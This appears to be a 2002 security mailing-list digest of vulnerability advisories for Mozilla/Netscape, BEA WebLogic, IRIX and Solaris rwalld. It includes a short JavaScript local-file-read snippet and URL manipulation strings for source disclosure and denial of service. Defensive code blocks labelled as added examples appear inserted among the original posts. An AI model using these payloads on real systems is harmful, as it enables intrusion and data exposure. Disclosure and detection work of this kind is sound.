eSecurityOnline Security Advisories notes

2002-04-30 Thread researchteam5


Hello,

To help clear up any confusion about the Discovery Dates associated 
with the group of advisories that we are publishing today, I should
explain the situation.

We are publishing our advisories in groups after each group is approved
internally.  With the exception of the Microsoft issues, none of the 
vulnerabilities have been posted or discussed in public forums or lists.

The discovery date that we list in the advisories refers to the date on
which we discovered the advisory, rather than the date that we made the
information public.  Since none of these vulnerabilities (except for the 
Solaris CACHEFSD) have been actively exploited / seen in the wild, we have
been patient in working with and waiting for vendors to complete
vulnerability validation, and for patches to be developed and posted to
vendor sites.

We plan to publish more advisories in the near future, and hopefully in a
much more timely fashion.

Regards,
Ken Williams
eSecurityOnline Research and Development Team

Ken Williams ; CISSP ; Technical Lead ; [EMAIL PROTECTED] 
eSecurityOnline - an eSecurity Venture of Ernst & Young 
[EMAIL PROTECTED] ; www.esecurityonline.com ; 1-877-eSecurity 



Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread GreyMagic Software

GreyMagic Security Advisory GM#001-NS
=====================================

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
======================

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.


Important notes:
================

Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to [EMAIL PROTECTED] and [EMAIL PROTECTED]

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a Bug Bounty program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conducts made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.


[1] http://home.netscape.com/security/bugbounty.html


Introduction:
=============

XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 Jelmer published an advisory titled MSIE6 can read local
files, which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by
MS02-008).

[1] http://www.xs4all.nl/~jkuperus/bug.htm
[2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
===========

Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the open method to a web page that will redirect to a
local/remote file it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText
property.


Exploit:
========

This example attempts to read c:/test.txt, getFile.asp internally
redirects to file://c:/test.txt:

var oXML=new XMLHttpRequest();
oXML.open("GET","getFile.asp",false);
oXML.send(null);
alert(oXML.responseText);


Solution:
=========

Users of Netscape Navigator should move to a better performing, less buggy
browser.


Tested on:
==========

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-ns/.


Feedback:
=========

Please mail any questions or comments to [EMAIL PROTECTED]

- Copyright © 2002 GreyMagic Software.




Re: QPopper 4.0.4 buffer overflow

2002-04-30 Thread J Mike Rollins


> Affected versions 4.0.3 and 4.0.4. default install.
> Servers, not processing user's configuration file
> (~/.qpopper-options) are insensible to this bug.

Our testing has shown that you must use the -u parameter to be susceptible
to this vulnerability.

If you don't use the -u parameter for qpopper this file is not accessed.

You can use the -d parameter to view the debug output to verify this.

Mike

  UNIX Systems Administrator at Wake Forest University.
==============================================================
  J. Mike Rollins            [EMAIL PROTECTED]
  Wake Forest University     http://www.wfu.edu/~rollins
  Winston-Salem, NC          work: (336) 758-1938
==============================================================






KPMG-2002016: Bea Weblogic incorrect URL parsing issues

2002-04-30 Thread Peter Gründl



Title: Bea Weblogic incorrect URL parsing issues

BUG-ID: 2002016
Released: 30th Apr 2002


Problem:
========
The Bea Weblogic server incorrectly parses certain types of URL
requests. This can result in the physical path being revealed,
a Denial of Service situation and revealing of .jsp sourcecode.


Vulnerable:
===========
- Bea Weblogic V6.1 Service Pack 2 on Windows 2000 Server
- Other versions were not tested.


Details:
========
A problem with the URL parser in Bea Weblogic could allow a
malicious user to reveal the physical path to the web root,
cause a Denial of Service and reveal the sourcecode of .jsp files.

Physical webroot)
By appending %00.jsp to a normal .html request, a compiler error
would in some cases be generated that would print out the path
to the physical web root. A similar result can be achieved by
prefixing with %5c (backslash):


Denial of Service)
This issue is very similar to the one reported in KPMG-2002003, in which
we published that requesting a DOS device and appending .jsp to the
request would exhaust the working threads and cause the web service to
stop parsing HTTP and HTTPS requests.

If a malicious user also added %00 in the request, it would still work.

The server can handle about 10-11 working threads, so when this
number of active threads has been reached, the server will no
longer service any requests. Since both HTTP and HTTPS are handled
by the same module, both are crippled if one is attacked.


Sourcecode revealed)
There are a number of ways to manipulate the URL in a way that will
allow a malicious user to read the contents of a .jsp file.
One way is to append %00x to the request, another could be to add
+. to the request (exclamation marks excluded).



Vendor URL:
===========
You can visit the vendor's webpage here: http://www.bea.com


Vendor response:
================
The vendor was contacted about the first issue on the 6th of
November, 2001 and subsequently on the 12th of March, 2002 and
finally on the 22nd of March, 2002 about the remaining issues.
On the 25th of March, 2002 we received a private hotfix, which
corrected the issues. On the 22nd of April, 2002 the vendor
released a public bulletin.

The vendor's bulletin can be seen here: (note that the url has
been wrapped for readability)

http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?
highlight=advisoriesnotifications&path=components/dev2dev/
resourcelibrary/advisoriesnotifications/
securityadvisoriesbea020303.htm

Be sure you read the vendor bulletin, as it suggests other
security settings that might prevent future similar issues.


Corrective action:
==================
The following has been copied from the vendor bulletin:

BEA WebLogic Server and Express version 6.1 standalone
 or as part of BEA WebLogic Enterprise 6.1 on all OS platforms
 Action: Apply Service Pack 2 and then apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR069809_610sp2_v2.jar

 When Service Pack 3 becomes available, you can use that jar
 instead of Service Pack 2 and this patch.


 BEA WebLogic Server and Express version 6.0 standalone
 or as part of BEA WebLogic Enterprise 6.0 on all OS platforms
 Action: Apply Service Pack 2 with Rolling Patch 3 and then
 apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR069809_60sp2rp3.jar


 BEA WebLogic Server and Express version 5.1 standalone
 or as part of BEA WebLogic Enterprise 5.1.x on all OS platforms
 Action: Apply Service Pack 11 and then apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR069809_510sp11_v2.jar

 When Service Pack 12 becomes available, you can use that jar
 instead of Service Pack 11 and this patch.


 BEA WebLogic Server and Express 4.5.2 on all OS platforms
 Action: Apply Service Pack 2 and then apply this patch:

 ftp://ftpna.bea.com/pub/releases/security/CR045420_wls452sp2.zip


 BEA WebLogic Server and Express 4.5.1 on all OS platforms
 Action: Apply Service Pack 15.



Author: Peter Gründl ([EMAIL PROTECTED])


KPMG is not responsible for the misuse of the information we provide
through our security advisories. These advisories are a service to
the professional security community. In no event shall KPMG be lia-
ble for any consequences whatsoever arising out of or in connection
with the use or spread of this information.
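The request shapes described in the advisory (a %00 inserted before or after the .jsp suffix, a %5c prefix, a DOS device name with .jsp appended, and a trailing "+.") are easy to pick out of an access log after the fact. The following Python is an added example and is not KPMG's or BEA's code: it parses Common Log Format lines, tags each request with the advisory's patterns, and counts flagged requests per client, since a burst from one source toward the 10-11 working-thread ceiling is the thread-exhaustion signal. The log format, the DOS device-name list and the sample log lines are this example's own assumptions and constructed data.

```python
"""Flag the WebLogic URL-manipulation patterns from KPMG-2002016 in
Common Log Format access logs.  Added example, not KPMG's or BEA's code."""

import re
from collections import Counter
from urllib.parse import unquote

# Reserved DOS device names; the advisory cites requesting such a name with
# a .jsp suffix as the thread-exhaustion trigger (this name list is assumed).
DOS_DEVICES = {"con", "prn", "aux", "nul"} | {
    f"{dev}{n}" for dev in ("com", "lpt") for n in range(1, 10)
}

# Common Log Format; the group names are this example's own.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def classify_path(raw_path):
    """Return the names of the advisory's patterns that a request path matches.

    The path is decoded once with unquote (which leaves '+' alone), so a
    %00.jsp or %00x suffix shows up as an embedded NUL and %5c as a
    backslash.  Only the resource part is inspected; the query string is
    dropped because the advisory's cases all sit in the path.
    """
    findings = []
    decoded = unquote(raw_path)
    resource = decoded.split("?", 1)[0]
    if "\x00" in resource:
        findings.append("embedded-nul")          # %00.jsp, %00x
    if "%5c" in raw_path.lower() or "\\" in resource:
        findings.append("backslash")             # %5c prefix
    segment = resource.rsplit("/", 1)[-1]
    if segment.split(".", 1)[0].lower() in DOS_DEVICES:
        findings.append("dos-device-name")       # e.g. CON.jsp
    if resource.endswith("+."):
        findings.append("trailing-plus-dot")     # the "+." source-disclosure form
    return findings


def scan_log(text):
    """Return (ip, status, path, findings) for every parsable line that matches."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_path(m.group("path"))
        if findings:
            hits.append((m.group("ip"), int(m.group("status")),
                         m.group("path"), findings))
    return hits


def requests_per_source(hits):
    """Count flagged requests per client address."""
    return Counter(ip for ip, _, _, _ in hits)


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Apr/2002:10:01:02 +0200] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [30/Apr/2002:10:01:05 +0200] "GET /index.html%00.jsp HTTP/1.0" 500 812
10.0.0.9 - - [30/Apr/2002:10:01:07 +0200] "GET /%5cindex.html HTTP/1.0" 500 801
10.0.0.9 - - [30/Apr/2002:10:01:09 +0200] "GET /con.jsp HTTP/1.0" 200 0
10.0.0.9 - - [30/Apr/2002:10:01:11 +0200] "GET /login.jsp%00x HTTP/1.0" 200 2210
10.0.0.9 - - [30/Apr/2002:10:01:13 +0200] "GET /login.jsp+. HTTP/1.0" 200 2210
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, status, path, findings in hits:
        print(f"{ip} {status} {path} -> {', '.join(findings)}")
    print(requests_per_source(hits))
```

Matching on the decoded path means a single encoding layer is enough; a 500 status next to a flagged path is the compiler-error case the advisory uses to leak the web root, while repeated device-name hits from one address are the DoS case.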





Re: Slrnpull Buffer Overflow (-d parameter)

2002-04-30 Thread Bill Nottingham

Alex Hernandez ([EMAIL PROTECTED]) said: 
> Linux RH.6.2 Sparc64 and below versions.

On Red Hat Linux 6.2 for sparc:

# ls -l /usr/bin/slrnpull
-rwxr-s---    1 news     news        48688 Feb  7  2000 /usr/bin/slrnpull
# rpm -q slrn-pull
slrn-pull-0.9.6.2-4

With all updates applied:

# ls -l /usr/bin/slrnpull
-rwxr-s---    1 root     news        55456 Mar  1  2001 /usr/bin/slrnpull
# rpm -q slrn-pull
slrn-pull-0.9.6.4-0.6

Hence, while you may be able to get group news, the program is only
runnable by group news. So, I don't think there are any security
implications here.

Bill



RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm

Disturbing.

Netscape sure must be in financial problems since they are selling out on
their users' security for a lousy $1000.

I know for one that I personally will release any future Netscape advisories
with full public disclosure and without prior Netscape notification. As a
matter of fact, why not start now ?

The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun.
A typical IRC URL could look like this:

IRC://IRC.YOUR.TLD/#YOURCHANNEL

The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. 
If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following
error: 

The exception unknown software exception (0xc0fd) occurred in the
application at location 0x60e42edf 

Mozilla 0.9.9 gives a similar exception: 

The exception unknown software exception (0xc0fd) occurred in the
application at location 0x60dd2c79.

Other versions of Mozilla/NS6/Galeon likely share the same flaw.
I haven't tested further on how practically exploitable this is.
Short example online at

http://jscript.dk/2002/4/moz1rc1tests/ircbufferoverrun.html

Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection
vulnerability.

When embedding a stylesheet with the LINK element, access to CSS files
from other protocols is prohibited by the security manager. A simple HTTP
redirect circumvents this security restriction and it becomes possible to
use local or remote files of any type, with the side effect that you can
detect if specific local files exist.

http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp


Regards
Thor Larholm
Jubii A/S - Internet Programmer



-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape 6 and Mozilla (GM#001-NS)



IRIX cpr vulnerability

2002-04-30 Thread SGI Security Coordinator

-BEGIN PGP SIGNED MESSAGE-

_

  SGI Security Advisory

Title:  IRIX cpr vulnerability
Number: 20020409-01-I
Date:   April 30, 2002
Reference:  CAN-2002-0173
__

- ---
- --- Issue Specifics ---
- ---

It's been reported that there is a potential buffer overflow vulnerability
in the /usr/sbin/cpr program. If successfully exploited, this can lead to a
root compromise.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in IRIX 6.5.11 and later versions.


- --
- --- Impact ---
- --

The cpr binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.cpr (the SGI Checkpoint-Restart Software).

To see if cpr is installed, execute the following command:

  $ versions eoe.sw.cpr
  I = Installed, R = Removed

     Name          Date        Description

  I  eoe           09/19/2000  IRIX Execution Environment, 6.5.10f
  I  eoe.sw        09/19/2000  IRIX Execution Environment Software
  I  eoe.sw.cpr    09/19/2000  SGI Checkpoint-Restart Software

If the command returns output similar to the above, then cpr is installed.

This vulnerability may not be exploited by a remote user, a local account
is required.

This vulnerability has been fixed in IRIX 6.5.11.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0173


- 
- --- Temporary Workaround ---
- 

If you don't use the Checkpoint Restart software, it can be uninstalled
using the command:

  # versions remove eoe.sw.cpr

If you use the software, then SGI recommends upgrading to IRIX 6.5.11
or later.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation is
to upgrade to IRIX 6.5.11 or later.


   OS Version     Vulnerable?   Patch #   Other Actions
   ----------     -----------   -------   -------------
   IRIX 3.x       unknown                 Note 1
   IRIX 4.x       unknown                 Note 1
   IRIX 5.x       unknown                 Note 1
   IRIX 6.0.x     unknown                 Note 1
   IRIX 6.1       unknown                 Note 1
   IRIX 6.2       unknown                 Note 1
   IRIX 6.3       unknown                 Note 1
   IRIX 6.4       unknown                 Note 1
   IRIX 6.5       yes                     Notes 2 & 3
   IRIX 6.5.1     yes                     Notes 2 & 3
   IRIX 6.5.2     yes                     Notes 2 & 3
   IRIX 6.5.3     yes                     Notes 2 & 3
   IRIX 6.5.4     yes                     Notes 2 & 3
   IRIX 6.5.5     yes                     Notes 2 & 3
   IRIX 6.5.6     yes                     Notes 2 & 3
   IRIX 6.5.7     yes                     Notes 2 & 3
   IRIX 6.5.8     yes                     Notes 2 & 3
   IRIX 6.5.9     yes                     Notes 2 & 3
   IRIX 6.5.10    yes                     Notes 2 & 3
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no


   NOTES

 1) This version of the IRIX operating system has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.11 or a later version of IRIX.


- 
- --- Acknowledgments 
- 

SGI wishes to thank TESO Security, FIRST and the users of the Internet
Community at large for their assistance in this matter.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or

IRIX /dev/ipfilter Denial of Service vulnerability

2002-04-30 Thread SGI Security Coordinator

-BEGIN PGP SIGNED MESSAGE-

_

  SGI Security Advisory

Title:  /dev/ipfilter Denial of Service vulnerability
Number: 20020408-01-I
Date:   April 30, 2002
Reference:  CAN-2002-0172
__

- ---
- --- Issue Specifics ---
- ---

SGI has determined that the default permissions on /dev/ipfilter as created
by /dev/MAKEDEV could lead to a Denial of Service attack.  The default
permissions were 644, and while the permissions are set to that value it is
possible for a non-root user to disrupt network traffic.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.


- --
- --- Impact ---
- --

The /dev/ipfilter device is created by default on IRIX 6.5 systems during
installation.  The ipfilterd software that is intended to use this device is
not installed by default, it is part of the eoe.sw.ipgate package.

To determine if you are vulnerable, execute the following command:

   $ ls -l /dev/ipfilter
   crw-r--r--    1 root     sys       59,  0 Apr 12 08:33 /dev/ipfilter

If your /dev/ipfilter shows the permissions and ownership of 644 as in the
example above, then you are vulnerable.

These vulnerabilities may not be exploited by a remote user, a local account
is required.

This issue has been corrected in IRIX 6.5.11 and later versions.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0172


- 
- --- Temporary Workaround ---
- 

You can fix the permissions of /dev/ipfilter with the following command:

   # chmod 600 /dev/ipfilter

After running that command, it should look like this:

   # ls -l /dev/ipfilter
   crw-------    1 root     sys       59,  0 Apr 12 08:33 /dev/ipfilter

However, SGI recommends upgrading to IRIX 6.5.11 or later because if the
/dev/MAKEDEV script is run it will reset the permissions to 644.  The
/dev/MAKEDEV script has been changed in IRIX 6.5.11 to create the device
with 600 permissions.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation is
to upgrade to IRIX 6.5.11 or later.


   OS Version     Vulnerable?   Patch #   Other Actions
   ----------     -----------   -------   -------------
   IRIX 3.x       unknown                 Note 1
   IRIX 4.x       unknown                 Note 1
   IRIX 5.x       unknown                 Note 1
   IRIX 6.0.x     unknown                 Note 1
   IRIX 6.1       unknown                 Note 1
   IRIX 6.2       unknown                 Note 1
   IRIX 6.3       unknown                 Note 1
   IRIX 6.4       unknown                 Note 1
   IRIX 6.5       yes                     Notes 2 & 3
   IRIX 6.5.1     yes                     Notes 2 & 3
   IRIX 6.5.2     yes                     Notes 2 & 3
   IRIX 6.5.3     yes                     Notes 2 & 3
   IRIX 6.5.4     yes                     Notes 2 & 3
   IRIX 6.5.5     yes                     Notes 2 & 3
   IRIX 6.5.6     yes                     Notes 2 & 3
   IRIX 6.5.7     yes                     Notes 2 & 3
   IRIX 6.5.8     yes                     Notes 2 & 3
   IRIX 6.5.9     yes                     Notes 2 & 3
   IRIX 6.5.10    yes                     Notes 2 & 3
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no


   NOTES

 1) This version of the IRIX operating system has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.11 or later.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/patches/

SGI patches for IRIX can be found at the following patch servers:
http://support.sgi.com/irix/ and ftp://patches.sgi.com/

SGI freeware updates for IRIX can be found at:
http://freeware.sgi.com/

SGI fixes for SGI open sourced code can be found on:
http://oss.sgi.com/projects/

SGI patches and RPMs for Linux can be found at:
http://support.sgi.com/linux/ or
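The check-and-repair step from the workaround above, as an added example that is not SGI's code: a POSIX sh function reads the permission string from ls -ld (the same output the advisory tells you to inspect), reports whether a device node is still at the 644 that /dev/MAKEDEV created or already at 600, and applies the chmod if asked. The function names and the exit codes are this example's own conventions; it uses only ls, cut and chmod so it runs on an IRIX-era shell.

```shell
#!/bin/sh
# Added example (not SGI's code): verify that a device node carries only the
# owner read/write bits, the state the advisory recommends for /dev/ipfilter,
# and repair it if not.

# mode_of PATH  -> the nine permission characters from ls -ld, e.g. rw-r--r--
mode_of() {
    ls -ld "$1" | cut -c2-10
}

# check_device PATH
#   returns 0 if the mode is rw------- (600)
#           1 if the node exists but has other bits set (644 as MAKEDEV left it)
#           2 if the node does not exist
check_device() {
    [ -e "$1" ] || return 2
    [ "$(mode_of "$1")" = "rw-------" ] && return 0
    return 1
}

# fix_device PATH  -> chmod 600 and re-check; non-zero if the fix did not stick
fix_device() {
    chmod 600 "$1" || return 1
    check_device "$1"
}

# Usage: sh check_ipfilter.sh /dev/ipfilter
if [ $# -gt 0 ]; then
    rc=0
    check_device "$1" || rc=$?
    case $rc in
        0) echo "$1: ok, mode $(mode_of "$1")" ;;
        1) echo "$1: mode $(mode_of "$1"), run: chmod 600 $1" ;;
        2) echo "$1: not present" ;;
    esac
fi
```

Because /dev/MAKEDEV resets the node to 644 whenever it is re-run on releases before 6.5.11, the check is worth scheduling rather than running once; the exit codes let a cron job or a hardening script act on the result without parsing text.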

IRIX pmcd Denial of Service vulnerability

2002-04-30 Thread SGI Security Coordinator

-BEGIN PGP SIGNED MESSAGE-

_

  SGI Security Advisory

Title:  pmcd Denial of Service vulnerability
Number: 20020407-01-I
Date:   April 30, 2002
Reference:  CAN-2000-1193

__

- ---
- --- Issue Specifics ---
- ---

It's been reported that it is possible to feed certain parameters to the
/usr/etc/pmcd daemon that will make it grow in size to the point where a
Denial of Service attack can be created.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in IRIX 6.5.11 and later versions.


- --
- --- Impact ---
- --

The pmcd daemon is part of SGI's Performance Co-Pilot suite of performance
monitoring tools.  This is an optional product and is not installed by
default, but is supplied with the base OS.

To see if pmcd is installed, execute the following command:

% versions pcp_eoe
I = Installed, R = Removed

      Name                    Date        Description

   I  pcp_eoe                 01/22/2002  Performance Co-Pilot Execution Only
                                          Environment, 6.5.15f
   I  pcp_eoe.man             01/22/2002  PCP EOE Documentation, 6.5.15f
   I  pcp_eoe.man.relnotes    01/22/2002  PCP EOE Release Notes, 6.5.15f
   I  pcp_eoe.sw              01/22/2002  PCP EOE Software, 6.5.15f
   I  pcp_eoe.sw.eoe          01/22/2002  PCP EOE, 6.5.15f

If the output looks similar to the above, then Performance Co-Pilot is
installed, and you are vulnerable if the version shown is earlier than
6.5.11.

This vulnerability may be exploited by a remote user, no local account
is required.

This vulnerability has been fixed in IRIX 6.5.11 and later versions.

This vulnerability was assigned the following CVE:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1193
http://www.iss.net/security_center/static/4284.php


- 
- --- Temporary Workaround ---
- 

If you don't use the Performance Co-Pilot software, it can be uninstalled
using the command:

  # versions remove pcp_eoe

If you use the software, then SGI recommends upgrading to IRIX 6.5.11 or a
later version.


- 
- --- Solution ---
- 

SGI has not provided patches for this vulnerability. Our recommendation is
to upgrade to IRIX 6.5.11 or a later version.


   OS Version     Vulnerable?   Patch #   Other Actions
   ----------     -----------   -------   -------------
   IRIX 3.x       unknown                 Note 1
   IRIX 4.x       unknown                 Note 1
   IRIX 5.x       unknown                 Note 1
   IRIX 6.0.x     unknown                 Note 1
   IRIX 6.1       unknown                 Note 1
   IRIX 6.2       unknown                 Note 1
   IRIX 6.3       unknown                 Note 1
   IRIX 6.4       unknown                 Note 1
   IRIX 6.5       yes                     Notes 2 & 3
   IRIX 6.5.1     yes                     Notes 2 & 3
   IRIX 6.5.2     yes                     Notes 2 & 3
   IRIX 6.5.3     yes                     Notes 2 & 3
   IRIX 6.5.4     yes                     Notes 2 & 3
   IRIX 6.5.5     yes                     Notes 2 & 3
   IRIX 6.5.6     yes                     Notes 2 & 3
   IRIX 6.5.7     yes                     Notes 2 & 3
   IRIX 6.5.8     yes                     Notes 2 & 3
   IRIX 6.5.9     yes                     Notes 2 & 3
   IRIX 6.5.10    yes                     Notes 2 & 3
   IRIX 6.5.11    no
   IRIX 6.5.12    no
   IRIX 6.5.13    no
   IRIX 6.5.14    no
   IRIX 6.5.15    no
   IRIX 6.5.16    no


   NOTES

 1) This version of the IRIX operating system has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.11 or a later version of IRIX.


- 
- --- Acknowledgments 
- 

SGI wishes to thank Marcelo Magnasco, ISS, FIRST and the users of the
Internet Community at large for their assistance in this matter.


- -
- --- Links ---
- -

SGI Security Advisories can be found at:
http://www.sgi.com/support/security/ and
ftp://patches.sgi.com/support/free/security/advisories/

SGI Security Patches can be found at:
http://www.sgi.com/support/security/ and

Advisory + Exploit for Remote Root Hole in Default Installation of Popular Commercial Operating System

2002-04-30 Thread gobbles


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

GOBBLES SECURITY ADVISORY #32

ALERT! REMOTE ROOT HOLE IN DEFAULT INSTALL OF POPULAR OPERATING SYSTEM! ALERT!

Forward:
@route so was fydor trying to make his code unreadable when he write nmap?
@route or was that just the fallout of poor planning?
@route this is awful
@route if ( !victim || !sport || !dport || sd < 0) {
@route   fprintf(stderr, "send_udp_raw: One or more of your parameters suck!\n");
@route   free(packet);
@route   return -1;
@route }
@route This is the program that is used everywhere and written up in
 countless books?
@route it's pretty much obscene that this program doesnt use libnet

Systems Affected:
Sun Solaris 6, Sun Solaris 7, Sun Solaris 8
(sparc and x86 versions)


Threat Level:
Super duper high.


Vendor Notification Status:
Initial advisory sent to Sun Microsystems on Friday, April 5th.

After long series of email exchange, Sun.com engineers finally begin working
on developing patch for bug.

Days later, CERT contact GOBBLES about bug.  Dialogue happen then too with
CERT.  Both Sun Microsystems and CERT have promised to make sure that
GOBBLES name is in both official advisories released.  Hey, we do this for
fame and attention, now that we are no longer weaned we must do something!

Some time, full disclosure is real pain in ass.  Everyone want more and more
time to get things fixed before advisory is released.  Time to grace lists
with more GOBBLES Advisory.


Exploit:
A proof-of-concept exploit for this vulnerability has been attached to the
bottom of this email.  GOBBLES wrote it in way to keep unskilled from using
it, like security assessment team from Vigilante who not able to tell if
vulnerability is real or not in opensourced product after reading advisory.
At the same time, skilled penetrators should not have any trouble using the
code provided to exploit systems in the wild.

Don't send GOBBLES email asking for other versions of exploit.  Some things
better left private and given to close friends for their own motivations.
If you can't figure out how to work with this exploit and get remote root
from what is provided in the advisory, really there is no reason for you to
be using an exploit.


A Few Words:
There are some thing that GOBBLES have to say, some thing very heartfelt
that he need to communicate to the world, some thing that best said in song,
please take time to read lyric and understand what GOBBLES trying to say. . .

the sun has blessed
 the rays are gone
 and all the kids have left their tears and gone home,

 sweet 17, sour 29
 and i can't explain myself
 what i'd hoped to find
 you were all so kind
 when i was near,

 and if you're still feeling down
 then maybe you need me around
 to love and hold you
 don't say i hadn't told you so
 maybe you need me around,

 i had no luck
 i had no shame
 i had no cause
 just seventeen days of rain
 and you in my eyes,

 just one more song to slay this earth
 and i can't explain myself just what it's worth
 what was all i had
 but not all i'd need
 and i can't escape the fact that i still bleed,

 and if you're still feeling down
 and if this seems way too loud
 then maybe you need me around,

 i had no voice
 i had no drive
 i had no choice
 i've done my time
 had myself
 had my band
 i had my love
 had no hand in watching it all fall apart

 and if you're still feeling down
 then maybe you need me around
 to lift and scold you
 to send you crashing all right now
 maybe you need me around.

- -Blissed and Gone, the Smashing Pumpkins


Description of Problem (Part One):
One of the default RPC services in Sun Solaris versions 6-8 has an
insecure syslog() statement, which allow remote attacker to execute custom
code as root.

Hehe, GOBBLES bet you getting pissed because in all this length of advisory,
still no mention of what is vulnerable, hehehe, ;.  Keep
control of temper, and keep reading, because you about to find out, hehehe
GOBBLES is silly today.


Remotely Exploitable:
Yes.

Locally Exploitable:
Yes.

Privilege Attained After Exploitation:
Root.

Exploit Included:
As GOBBLES did mention previously, yes.  It get you root.  Girls will be
impressed with mailing list reading skills and source code leeching
technique utilized to gain remote root to Solaris machines.  Included
exploit for Sparc.


Name of Vulnerable Service:
$ grep rwall /etc/inetd.conf
# The rwall server allows others to post messages to users on this machine.
walld/1 tli rpc/datagram_v wait root /usr/lib/netsvc/rwall/rpc.rwalld rpc.rwalld

It rwalld that vulnerable.  It run as root.  Attacker get root from
exploiting it.


Description of Problem (Part Two):
Inside rwall_subr.c we see:

        /*
         * Make sure the wall program exists, is executable, and runs
         */
